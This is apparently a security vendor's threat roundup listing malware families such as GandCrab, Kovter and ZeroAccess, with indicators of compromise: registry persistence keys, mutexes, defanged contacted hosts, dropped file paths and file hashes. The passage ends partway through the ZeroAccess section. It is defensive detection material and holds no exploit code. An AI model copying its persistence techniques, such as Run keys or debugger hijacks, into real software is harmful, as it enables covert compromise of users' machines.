For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.

The most prevalent threats highlighted in this roundup are:

  • Win.Malware.Gandcrab-6954107-0
    Malware
    GandCrab is ransomware that encrypts documents, photos, databases and other important files using the file extension ".GDCB", ".CRAB" or ".KRAB". GandCrab is spread through both traditional spam campaigns, as well as multiple exploit kits, including Rig and GrandSoft.
     
  • Win.Malware.Kovter-6953553-0
    Malware
    Kovter is known for it's fileless persistence mechanism. This family of malware creates several malicious registry entries which store it's malicious code. Kovter is capable of reinfecting a system even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
     
  • Win.Packed.Scar-6952917-0
    Packed
    Scar will download and execute files to the system while attempting to spread to other machines by copying itself to removable media.
     
  • Win.Dropper.Lydra-6952708-0
    Dropper
    Lydra will monitor user activity to steal sensitive information like passwords and setups various persist mechanisms to ensure execution at startup.
     
  • Win.Trojan.Zeroaccess-6952579-0
    Trojan
    ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serves as a platform for conducting click fraud campaigns.
     
  • Doc.Downloader.Powload-6952235-0
    Downloader
    Powload is a malicious document that uses PowerShell to download malware. This campaign is currently distributing Emotet malware.
     
  • Win.Ransomware.Cerber-6952131-0
    Ransomware
    Cerber is ransomware that encrypts documents, photos, databases and other important files using the file extension ".cerber."
     
  • Win.Packed.Tofsee-6952124-0
    Packed
    Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator’s control.
     
  • Win.Malware.Emotet-6947486-0
    Malware
    Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails.
     
  • Win.Malware.Mikey-6953803-0
    Malware
    Mikey is a trojan that installs itself on the system, collects information and communicates with a C2 server, potentially exfiltrating sensitive information. This threats can also receive additional commands and perform other malicious actions on the system such as installing additional malware upon request.
     

Threats

Win.Malware.Gandcrab-6954107-0


Indicators of Compromise


Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: mrtauqkjwnb
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: taiqbyxzlxk
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: kgdxylqkehn
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: wthkafbhnnz
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: csrzoywxadl
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: wyvcshrzmzp
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: htiqstanrob
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: wpxojreokly
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: blyfivnejxn
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: lrrnacksfnc
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: kamceprdczy
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: itqfvoapacm
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: ncqtnmbrepx
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: wiuqosifjbq
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: sktkqyirmst
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: bwipaxisell
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: hdcpovptyus
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: jquurrwhzkq
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: ysblnuivkrs
1
MutexesOccurrences
Global\pc_group=WORKGROUP&ransom_id=4a6a799098b68e3c19
\BaseNamedObjects\Global\pc_group=WORKGROUP&ransom_id=ab8e4b3e3c28b0e419
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
66[.]171[.]248[.]17819
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
1[.]1[.]168[.]192[.]in-addr[.]arpa19
ipv4bot[.]whatismyipaddress[.]com19
1[.]0[.]168[.]192[.]in-addr[.]arpa19
malwarehunterteam[.]bit19
ns1[.]virmach[.]ru19
politiaromana[.]bit19
gdcb[.]bit19
ns2[.]virmach[.]ru19
Files and or directories createdOccurrences
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c519
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\O1OD133V.htm19
%HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\C5MZMU22\desktop.ini15
%HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\C5MZMU22\ipv4bot_whatismyipaddress_com[1].htm15
%APPDATA%\Microsoft\hghbta.exe1
%APPDATA%\Microsoft\gknrwh.exe1
%APPDATA%\Microsoft\fpimav.exe1
%APPDATA%\Microsoft\menqqw.exe1
%APPDATA%\Microsoft\yajjhk.exe1
%APPDATA%\Microsoft\fttqrq.exe1
%APPDATA%\Microsoft\ggxike.exe1
%APPDATA%\Microsoft\lxhknn.exe1
%APPDATA%\Microsoft\aojsiy.exe1
%APPDATA%\Microsoft\nsxpnb.exe1
%APPDATA%\Microsoft\tywgei.exe1
%APPDATA%\Microsoft\ucihie.exe1
%APPDATA%\Microsoft\odrxqe.exe1
%APPDATA%\Microsoft\clhbpq.exe1
%APPDATA%\Microsoft\vacwir.exe1
%APPDATA%\Microsoft\pzgooz.exe1
%APPDATA%\Microsoft\ivnaov.exe1
%APPDATA%\Microsoft\yvudxg.exe1
%APPDATA%\Microsoft\lfkjbm.exe1
\Win32Pipes.0000052c.000000171
\Win32Pipes.0000052c.000000191
See JSON for more IOCs
File Hashes
  • 1156e142aafbd439ee6bd2a9d0e8cd9fd4719ee9d9242b9c1916bfe1b45db99a
  • 14f1688ab3d4c0866797ad43dc7df51d913a5df763fb12c7b72391075945cd8d
  • 194966a4700fbad5d329b75df3794730255ec8afe5c2f385e45c79337f1cbb39
  • 1f2a5163a9b3206f45a03c23bb05ad6c71d22add96374d9c127db58fe72289a2
  • 3c8cdaf3626ede0754ea0f16a67c079ef4670cba8d0e1c4a88bd47856dbd49cb
  • 45376d6ccfe68d1b2b82ad50f59f376917e17a09e2be48da015770f6a549f7af
  • 468ea3dc192ff158b09e6cc09c8d4a190d5744dff6225edb93ae2385a75d9120
  • 4cd88fe74eabf6fff9bcf700cae21da6021a1b45ad2c759b873f00031ec2f60d
  • 5783f8f86692861ff73c02a84860086940a1dc31aa9c821804188f0e8e8ff1d0
  • 5e0171a3a7832430d85b4681a247bb0f82aa3f07f024fa8605d3e9f7836ca6ec
  • 7db58ac99c57662954d7f4183a5945bd352e7db6a0e3aebf31c19c29bc78a7d9
  • 8745527a3c123b9155ae7d470cc549fcecbd97be2c515b8711412e93071c1bab
  • b1a195b1dc49ec6adaed3f6a9eb1e3a1089106ab8503f5e541897230c9c2fd5e
  • c6a7fa1f1f89d235957ce7fd38051a7e9a921847a30c6309da1c5e8cffb71e5e
  • d3cd9d746c796dc68b4dfae7657fcec9bad4c00cf2addb4f90ac1480beb8e0b2
  • d8752dbe07dd9642d6bb7f65701338d99ce8fb718ae803eb12ea41ff5ca15671
  • e1f314bc382f2163df72cd7aa083a2d3a4a78b0e6315689359bb543b5ee872ae
  • f1f63b367f7731f515f3076835426af9086e950b218b5371bc23d8c51e3a7c02
  • f8fd3c82782868205270cdc0b2edfd8c51a5da900bede625a16c1943b4ccd1e3

Coverage


Screenshots of Detection

AMP




ThreatGrid




Umbrella



Win.Malware.Kovter-6953553-0


Indicators of Compromise


Registry KeysOccurrences
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WindowsUpdate 29
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUpgrade 29
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: internat.exe
28
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE
Value Name: DisableOSUpgrade
28
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE
Value Name: ReservationsAllowed
28
<HKLM>\SOFTWARE\WOW6432NODE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 28
<HKCU>\SOFTWARE\3a91c13ab1 28
<HKLM>\SOFTWARE\WOW6432NODE\3a91c13ab1 28
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
Value Name: 656f27d6
28
<HKCU>\SOFTWARE\3A91C13AB1
Value Name: 656f27d6
28
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
Value Name: 96f717b3
28
<HKCU>\SOFTWARE\3A91C13AB1
Value Name: 96f717b3
28
<HKLM>\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION 27
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
Value Name: 01b2a448
25
<HKCU>\SOFTWARE\3A91C13AB1
Value Name: 01b2a448
25
<HKLM>\System\CurrentControlSet\Control\SecurityProviders\Schannel 2
<HKLM>\SYSTEM\LastKnownGoodRecovery\LastGood 2
<HKLM>\SOFTWARE\WOW6432NODE\8A6FD29F760019C2A 1
<HKLM>\SOFTWARE\WOW6432NODE\S191vn 1
<HKLM>\SOFTWARE\WOW6432NODE\8A6FD29F760019C2A
Value Name: 22F2A9371858821393B
1
<HKLM>\SOFTWARE\WOW6432NODE\3E4A82EF50861857D 1
<HKLM>\SOFTWARE\WOW6432NODE\LM7zAclcB 1
<HKLM>\SOFTWARE\WOW6432NODE\S191VN
Value Name: noVD3r8i
1
<HKLM>\SOFTWARE\WOW6432NODE\S191VN
Value Name: Ja8WDQ2COI
1
<HKLM>\SOFTWARE\WOW6432NODE\3E4A82EF50861857D
Value Name: B6FAE5718727427E545
1
MutexesOccurrences
B3E8F6F86CDD9D8B28
A83BAA13F950654C28
EA4EC370D1E573DA28
Global\7A7146875A8CDE1E28
\BaseNamedObjects\408D8D94EC4F66FC24
\BaseNamedObjects\Global\350160F4882D1C9823
\BaseNamedObjects\053C7D611BC8DF3A23
\BaseNamedObjects\Global\ServicePackOrHotfix2
\BaseNamedObjects\Global\F7E10F769B0682E71
\BaseNamedObjects\2594BA9F8AA549A01
\BaseNamedObjects\95780D7FD6724D3D1
\BaseNamedObjects\93444A15B4316C7F1
\BaseNamedObjects\8AD0B80D27B7A6E81
\BaseNamedObjects\Global\CE758B9A901977241
\BaseNamedObjects\3E54017756DC8D881
\BaseNamedObjects\Global\E04DD8EC68AC932B1
\BaseNamedObjects\254092C2E3B50CC11
\BaseNamedObjects\1AF828CB730214EA1
\BaseNamedObjects\6CF52592B2A800761
\BaseNamedObjects\Global\15907BF02B9082CF1
Global\ebcd2841-665f-11e9-a007-00501e3ae7b51
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
23[.]10[.]207[.]1832
96[.]16[.]151[.]892
23[.]96[.]52[.]532
23[.]196[.]183[.]1702
126[.]51[.]184[.]101
104[.]119[.]186[.]701
55[.]20[.]15[.]801
27[.]121[.]99[.]801
166[.]57[.]220[.]2141
24[.]210[.]219[.]1361
103[.]83[.]13[.]1341
192[.]201[.]48[.]881
94[.]105[.]89[.]641
49[.]27[.]243[.]481
31[.]109[.]216[.]731
122[.]210[.]74[.]1901
97[.]158[.]71[.]2521
177[.]96[.]54[.]1601
207[.]4[.]93[.]2211
73[.]58[.]236[.]141
51[.]103[.]86[.]1601
157[.]32[.]43[.]201
174[.]135[.]47[.]971
59[.]76[.]122[.]1781
212[.]180[.]197[.]1461
See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
e10088[.]dspb[.]akamaiedge[.]net4
e3673[.]dspg[.]akamaiedge[.]net4
www[.]cloudflare[.]com1
cpanel[.]com1
cp[.]aliyun[.]com1
netcn[.]console[.]aliyun[.]com1
www[.]timo-ex[.]com1
Files and or directories createdOccurrences
%TEMP%\WindowsXP-KB968930-x86-ENG.exe4
%HOMEPATH%\Cookies\administrator@microsoft[1].txt4
%HOMEPATH%\Cookies\administrator@microsoft[2].txt4
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\55F5KQ7B.htm2
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\BY8YMTTN.htm2
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\DRMICMKU.htm2
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\DU14067I.htm2
%HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KACXHDUX\desktop.ini2
%SystemRoot%\inf\oem13.PNF2
%SystemRoot%\inf\oem13.inf2
%System32%\CatRoot2\dberr.txt2
%SystemRoot%\KB968930.log2
%HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KACXHDUX\WindowsXP-KB968930-x86-ENG[1].exe2
%HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KACXHDUX\en-us[1].htm2
%APPDATA%\Microsoft\Windows\Cookies\DU14067I.txt1
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\index[1].htm1
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\00A87HPC.htm1
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\9UBKMUJA.htm1
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\FQVQQJXR.htm1
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\V69XW46D.htm1
\5965c0b5c4bb27a5399e\wsmwmipl.dll1
\5965c0b5c4bb27a5399e\wtrinstaller.ico1
%HOMEPATH%\Local Settings\Application Data\cacipe\cacipe.exe1
%HOMEPATH%\Cookies\administrator@104.31.137[1].txt1
File Hashes
  • 03dae55b56d3cf11136529cd2be296e4d6aa1a017f44a898d11ecc0b1b43e16e
  • 06f1a2cffda751ae87026e4d5f54c2767a474b3aca7c9ddd2b1f7247a3ff75f6
  • 0b01f3a59fcaa6520b12f9e3bdda2615e25b41e1d5c9e23e36a5f61c75e960ba
  • 19c78081714b6154ce25bb431959dc537618338038ae30c866afb3d6d0094996
  • 1f3a83a9744812c5b094691b4a87c4475fd8cbb85e69bf298edf917589261d4a
  • 296af0b5e6f6e033108a2a7109f40e1152f1c4ead15db644dc5d0d0973de21f4
  • 2a5c411fd65bb32f8f72b06ad17d8cb20258fc92dd1a7051e44550c314cc77f5
  • 3b94d3a36980ad21baaf5c62d669160988880e9aac3c2db29c3f23609a4eaa53
  • 3cbcc6671e6a7092a8a3f52d3cf93ff3d7c420fe6b0a34ec8bd0071a7d685217
  • 3eab679b54cca6b0352b05c821b65dbc34e16f323d60986d728ea955897a55ee
  • 44c5491ef99c542e06b1e166e5313dfb0007dd248bd08c6edaf72ce32f45232b
  • 4b21ddc1d7e40802368f07299c0634f96323285c829aacea603aefc8f8f97e28
  • 4f586d783cbd24a2cddee826f172ffeffbb953913721b87090f73cdc20e5da1b
  • 5423ba59c1ae44dcd47385f0820c020657f56e2511453937adeb1eb73dcb5b2c
  • 54d941b8f77a638074bc1a7f59f8f1650ca7e4e3077b7af6c79ebb9448656d15
  • 552d1a03140e12a901753649a8eb234a337ee08dd57c1892f3a641bd7c1e332c
  • 613d13d8759215714c4af6dc6f7af9e8984816d10265fc4203e3b87dddc784d7
  • 7c54f727e0a21feecd3f1f4757050ff27722b0097db4781b25a157376c7e3693
  • 83779e88704948dc02873d609db5d3efb4a47f968b5ce9d0e5edf02a7b7e56e7
  • 91441e8775ea05faace24c054d0d913459d9e2d61d9cb2edec9692d2dc099e78
  • a5d9ccde01ee0baee4d86ae8bedce0bee0e6637f818e9707582481fa3459b87c
  • a606074562594ed99706376dec2e0991de42f98dd5c2718253e796b75b7d748c
  • b15ffdd820f05d45e29a1a58a15a0ac04e2c694e0507146de04f2038e52e5187
  • cafc5428cde0b46cc3472becf2a7360c309b6e7fd6b87243238eff0684215b84
  • cb5be428b5adeb1cfd372ea525bc8ee0e6244f05e4a25779e9ba5d1da57b2f12
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP



ThreatGrid



Win.Packed.Scar-6952917-0


Indicators of Compromise


Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\localNETService 27
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\LOCALNETSERVICE
Value Name: Type
27
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\LOCALNETSERVICE
Value Name: Start
27
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\LOCALNETSERVICE
Value Name: ErrorControl
27
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\LOCALNETSERVICE
Value Name: ImagePath
27
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\LOCALNETSERVICE
Value Name: DisplayName
27
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\LOCALNETSERVICE
Value Name: WOW64
27
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\LOCALNETSERVICE
Value Name: ObjectName
27
<HKLM>\Software\Wow6432Node\localNETService 17
<HKLM>\SOFTWARE\localNETService 15
<HKLM>\SOFTWARE\WOW6432NODE\LOCALNETSERVICE
Value Name: Value_8350
1
<HKLM>\SOFTWARE\WOW6432NODE\LOCALNETSERVICE
Value Name: Value_31696
1
<HKLM>\SOFTWARE\WOW6432NODE\LOCALNETSERVICE
Value Name: Value_12733
1
<HKLM>\SOFTWARE\WOW6432NODE\LOCALNETSERVICE
Value Name: Value_33107
1
<HKLM>\SOFTWARE\WOW6432NODE\LOCALNETSERVICE
Value Name: Value_24485
1
<HKLM>\SOFTWARE\WOW6432NODE\LOCALNETSERVICE
Value Name: Value_29347
1
<HKLM>\SOFTWARE\WOW6432NODE\LOCALNETSERVICE
Value Name: Value_48270
1
<HKLM>\SOFTWARE\WOW6432NODE\LOCALNETSERVICE
Value Name: Value_58951
1
<HKLM>\SOFTWARE\WOW6432NODE\LOCALNETSERVICE
Value Name: Value_3373
1
<HKLM>\SOFTWARE\WOW6432NODE\LOCALNETSERVICE
Value Name: Value_25588
1
<HKLM>\SOFTWARE\WOW6432NODE\LOCALNETSERVICE
Value Name: Value_8958
1
<HKLM>\SOFTWARE\WOW6432NODE\LOCALNETSERVICE
Value Name: Value_16087
1
<HKLM>\SOFTWARE\WOW6432NODE\LOCALNETSERVICE
Value Name: Value_3445
1
<HKLM>\SOFTWARE\WOW6432NODE\LOCALNETSERVICE
Value Name: Value_2899
1
<HKLM>\SOFTWARE\WOW6432NODE\LOCALNETSERVICE
Value Name: Value_24818
1
MutexesOccurrences
N/A-
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
N/A-
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
N/A-
Files and or directories createdOccurrences
%ProgramData%\localNETService27
%TEMP%\jzq100219.dat27
%ProgramData%\localNETService\localNETService.exe27
File Hashes
  • 042b5f70f7211b31877525378d4e96bfe446f8f0e180962446a65c5e8a17eb08
  • 08729005569c47f4d36611ac6f04e476e365e17578e6275c71b09b1007162907
  • 0da7373b6529e881f8de9d33bbe4717b934d3f9eb1159166537ae93f58b02a29
  • 0e7cccc382e99f10ef64bee8ec7be4c61e5dd2a2b41402e1c824912158e9d097
  • 0ec741d2518772fc28534da4da8fbc7581d1cbe14864022412b971ae9fb8febb
  • 25782acb55d3cd762558994ac725e31083cb8f10eb483877b3b9c3a178cba927
  • 299325258ce603f5cbc78002e165f7b988596b2a626d5e5632c8f7c0b97d9fd0
  • 2a13a36bc24d110399adde37adcbe1128d66ddf33bdccd3c90e37a5353eb1dcd
  • 316803348e02989f019715f85e1f479506a3e74a67744f6dbe589380d8b9ab3d
  • 514c836caccb6cf621230443278632465b7b10c4170b8a20109f0fb067444a65
  • 572b94765953cd7d0d8a9bc4128b3805327104207af71bccc32f8f0cd580b4ff
  • 5c7283a449024ccf30840ebedd11134742695875568e9619cda06b39bec6ec67
  • 65d6f8a3358165bdbff21a025d43f182efbe9ea87feead320d5e10eea961fbd2
  • 65dcb37789486112ef98cd5ce423b36beaa1b7fd1f854348b62d3f76b0f20540
  • 694f63471c9fa8220b0312b71a1a268eaf6fc3a9e1c2c2be17c79a000ef0f1ca
  • 789b97d71b0ad420bdba65d5da91a82cd3e6a4c5a5f6ed3f2f440e5e3bfed327
  • 845f60e36148fd53502baea5c223f8103c1e214fe8fbfaba15c1b57b3ce100c7
  • 8884ba2c677a3f6280211683ff0c28fd6522044d59f86662fd630ad8311d7353
  • 8c0a5bdae921786a11fbfe67389a04caffc271fcb67633776cff4fe16d1a47a7
  • 8d2d5b172a07beee3b67ac16076b89a140f98d189d8ae0873dd110bdc6b28692
  • 8d34f3d96b6f7eb3f99b865cb449735fe2ec411d44498a5a61e148ffe166a714
  • 8e684a3f609ac8e4e47ceabcda4abd75d80f699b313de65fba2e5adedee1f874
  • 9161e4bf4085fe4f6256178832565a787e6853b0003dbcbdce3e3777b614cf71
  • 990851a27f622a2a4f8d3d818b9383a4551fd29c00ee327dc509fb088bbdc03b
  • 9f522963850cbc45dac570eea66a46822c21ea3aed095eb8aa8ec8381eb15bf5
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP



ThreatGrid



Win.Dropper.Lydra-6952708-0


Indicators of Compromise


Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: internat.exe
42
<HKLM>\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List 42
<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\policies\Explorer\Run 42
<HKLM>\SOFTWARE\Classes\Wow6432Node\CLSID\{65D5AFFB-D4EF-49AA-GFFG-5DA5E12E300A} 42
<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run 42
<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices 42
<HKCU>\SOFTWARE\WinRAR\General 42
<HKCU>\SOFTWARE\WinRAR 42
<HKLM>\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{65D5AFFB-D4EF-49AA-GFFG-5DA5E12E300A}
Value Name: ThisEXE
42
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: lsassv
42
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: msrpc
42
<HKCU>\SOFTWARE\WINRAR\GENERAL
Value Name: Sound
42
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: c:\windows\servicew.exe
42
<HKLM>\SOFTWARE\Classes\CLSID\{65D5AFFB-D4EF-49AA-GFFG-5DA5E12E300A} 41
<HKU>\Software\Microsoft\Windows\ShellNoRoam\MUICache 41
<HKLM>\SYSTEM\CurrentControlSet\Services\winsys 38
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: winsys
38
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: winsys
38
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSERVICES
Value Name: winsys
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSYS
Value Name: DependOnGroup
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSYS
Value Name: DependOnService
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSYS
Value Name: Description
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSYS
Value Name: DisplayName
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSYS
Value Name: Group
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSYS
Value Name: ObjectName
38
MutexesOccurrences
N/A-
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
N/A-
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
N/A-
Files and or directories createdOccurrences
\Documents and Settings\All Users\Start Menu\Programs\Startup\AdobeGammaLoader.scr42
%SystemRoot%\mui42
%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup\AdobeGammaLoader.scr42
%SystemRoot%\calc.exe42
%SystemRoot%\lsassv.exe42
%SystemRoot%\msrpc.exe42
%SystemRoot%\mui\rctfd.sys42
%SystemRoot%\ole32w.dll42
%SystemRoot%\pool32.dll42
%SystemRoot%\regedit2.exe42
%SystemRoot%\servicew.exe42
%SystemRoot%\setupiwz.dll42
%SystemRoot%\unrar.dll42
%SystemRoot%\winsys.exe38
%SystemRoot%\ieks32.dll38
%SystemRoot%\viaud.dll38
%SystemRoot%\woron_scan_1.09_eng.exe29
%SystemRoot%\smart_scan_eng.exe13
%SystemRoot%\syswin.exe4
%SystemRoot%\ikf32.dll4
%SystemRoot%\iksec.dll4
File Hashes
  • 0b0700bab86aadc28b8216e487747e1f248b64db255972efd82b8a0b0e9fbaf0
  • 134610cf4c7463abd435a7e9e5c3957e1b013d74b73248129f77eda2023bf341
  • 149aa87d3b637af6bc98b1b317c88c0faf1aac59d3ae0228f82375dc63668e27
  • 16877fdf6baa760ff501d6ffac2d827175debe7d1788bb1d9ebf96359d3ea8ed
  • 181fb91a7a3ea5d60862a240abe074d704385a41a4fd2a7c343171452ab207a3
  • 19ed54738b7eacd638cb8f6c7f41bebce61c596071ff8048c85c2c94ceb9b59d
  • 1be2192207e35f4d286154428882707f8fbc947073f87de650e3cae25aac6a53
  • 1bf0f79aa7076f8e0499646d892b1c883a12b76720ec1ee95583e4f0bd1e2548
  • 209c3027ee89df1f9c43caa49f33d2ae796a6e4f75f41fa3d29a6c618236aeb5
  • 23e8478e532060223d05a4172626d3ce7280d0a50a3c98e55a20f3b67527d598
  • 3448fc8f0ba01e5e3f1c2200e09cb8ae7cdd0fb683a078520a8980b7cd8dbfd1
  • 385aba59012ba5552914fa5fa5c000d4327631b33eae8173c4c0ed39fdaf86e8
  • 39b0887601c58b9fa9703611d4a41790db3f5c42eeac30320796005d7cd3149a
  • 3ec22bdc7999fdfee532c1f83f3026dd2935b4210325664024c3de0ce60cbd92
  • 3f927933cb408dc994ce17f3afab04a2b0d6c6f63f13622c92b3466e3502e20f
  • 462b020edeec013d02f371189b6e26b868c9058f870de778f3bef56a3dd033ca
  • 48c62b14b624255d0887c3c7dcd7d2863b82ece90129b1214abb9a829eeb39a3
  • 490204655d5f6a89ee33f2b70efd100edbcc564ea27083cd30ae5bddda319e7e
  • 4b2c8b21a1c0350c52740a0e21151dec03786f2a1c2280315dac70815fb6ca23
  • 503e790a64d6232628252bb99642e3dbe0da13d6ee748a60ce5ee9bf0b91758d
  • 5619dc4d1f452579077dc95c069e9b9a059fc93285f734925133906e1d2bca1b
  • 5b2455a6d058652270681d6d7040111e74f468fe771f41588ad8038fe3d59803
  • 5dfa493f6d6b13c44867ed1e60a90462629383a7330f9fb0ffd1f43c017362e9
  • 795f0d8204993cd7c79551555b8b8d37a2d0cbe18ff1d01fc5cb3131c95ee958
  • 8267bc6bb334a0f103bc55df5d8a231dc485b76588eb664639cbb16972fef4d6
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP




ThreatGrid



Malware



Win.Trojan.Zeroaccess-6952579-0


Indicators of Compromise


Registry KeysOccurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\MSASCUI.EXE
Value Name: Debugger
28
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\WERFAULT.EXE
Value Name: Debugger
28
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\UI0DETECT.EXE
Value Name: Debugger
28
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\CTFMON.EXE
Value Name: Debugger
28
